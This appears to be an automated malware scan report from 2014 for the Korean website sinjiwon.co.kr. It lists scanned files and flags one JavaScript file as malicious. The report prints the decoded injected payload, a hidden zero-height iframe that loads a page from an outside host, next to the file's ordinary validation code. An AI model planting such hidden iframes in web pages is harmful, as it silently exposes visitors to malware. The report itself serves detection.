Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sinjiwon.co.kr
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sinjiwon.co.kr/ | 200 OK Content-Length: 43195 Content-Type: text/html | clean |
http://sinjiwon.co.kr/JS/active.js | 200 OK Content-Length: 17081 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/JS/JS.js | 200 OK Content-Length: 5471 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function new_win(filename,p_name,s_width,s_height,s_scrol){
    var x = screen.width;
    var y = screen.height;
    var wid = (x / 2) - (s_width / 2);
    var hei = (y / 2) - (s_height / 2);
    window.open(filename, p_name, "toolbar=0,location=0,directories=0,status=0,menubar=0,resizable=0,scrollbars=" + s_scrol + ",width=" + s_width + ",height=" + s_height + ",top=" + hei + ",left=" + wid + ",scrolbar=no");
}
function check_email(str){
    emailStr = str.valu check_num.focus(); return false } } }
function IsNotNullCheck (obj, msg, setFocus) {
    if (setFocus == null || setFocus == undefined) {
        setFocus = true;
    }
    if ( ( obj.value == "" ) || ( obj.value.indexOf(" ") == 0 ) ) {
        alert ( msg );
        if (setFocus) {
            obj.focus();
        }
        return true;
    }
    return false;
}
Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe>
Antivirus reports:
http://sinjiwon.co.kr/JS/JQuery.js | 200 OK Content-Length: 154668 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/JS/JQuery_Carousel.js | 200 OK Content-Length: 14310 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/JS/JQuery_Easing.js | 200 OK Content-Length: 8301 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/JS/JQuery_MouseWheel.js | 200 OK Content-Length: 2485 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/index.asp | 200 OK Content-Length: 54471 Content-Type: text/html | clean |
http://wcs.naver.net/wcslog.js | 200 OK Content-Length: 16780 Content-Type: application/javascript | clean |
http://sinjiwon.co.kr/js/LayerPopup.js | 200 OK Content-Length: 9743 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/member/login.asp | 200 OK Content-Length: 24564 Content-Type: text/html | clean |
http://sinjiwon.co.kr/member/mem_default.asp | 200 OK Content-Length: 20821 Content-Type: text/html | clean |
http://sinjiwon.co.kr/mypage/mycart.asp | 200 OK Content-Length: 15683 Content-Type: text/html | clean |
http://sinjiwon.co.kr/mypage/order_view.asp | 200 OK Content-Length: 158 Content-Type: text/html | clean |
http://sinjiwon.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sinjiwon.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 27 Aug 2014 12:32:26 GMT
Server: Microsoft-IIS/6.0
Content-Length: 54471
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDQSBRB=EIIEPFCCPFAJDNIOMGHKJIBE; path=/
X-Died: timeout at scan.pm line 1546.
X-Powered-By: ASP.NET
...54471 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sinjiwon.co.kr
Referer: http://www.google.com/search?q=sinjiwon.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.